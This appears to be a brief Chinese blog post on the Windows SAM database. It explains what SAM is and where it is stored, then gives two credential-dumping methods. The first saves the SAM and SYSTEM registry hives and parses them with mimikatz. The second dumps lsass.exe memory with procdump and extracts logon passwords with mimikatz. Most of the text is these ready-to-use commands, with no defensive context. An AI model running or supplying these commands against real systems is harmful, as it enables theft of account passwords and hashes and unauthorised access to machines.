一、sam特征

(1)全称:

security account manager

(2)存储位置:

C:\windows\system32\config\SAM

(3)一旦创建,即产生,一旦销毁,即消失,即使账号重复也将重新生成新的hash

二、提取sam密码

法一:提取命令:(win2K可以直接使用CS或者msf或者mimikatz提取明文密码)

reg save hklm\sam C:\sam.hive
reg save hklm\system c:\system.hive
lsadump::sam /system:system.hive /sam:sam.hive

Administrator导出hash

 

Administrator导出hash

 

法二:导出lsass.dmp文件:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

Administrator导出hash

 Administrator导出hash

导出的lsass.dmp文件有时比较大,所以可以压缩一下,然后使用mimikatz进行破解

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

Administrator导出hash

相关文章:

  • 2021-06-13
  • 2022-12-23
  • 2021-10-07
  • 2021-11-10
  • 2021-10-24
  • 2021-12-28
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2022-02-20
  • 2021-11-13
  • 2022-01-22
  • 2021-04-13
  • 2021-10-28
  • 2021-11-04
  • 2021-12-15
相关资源
相似解决方案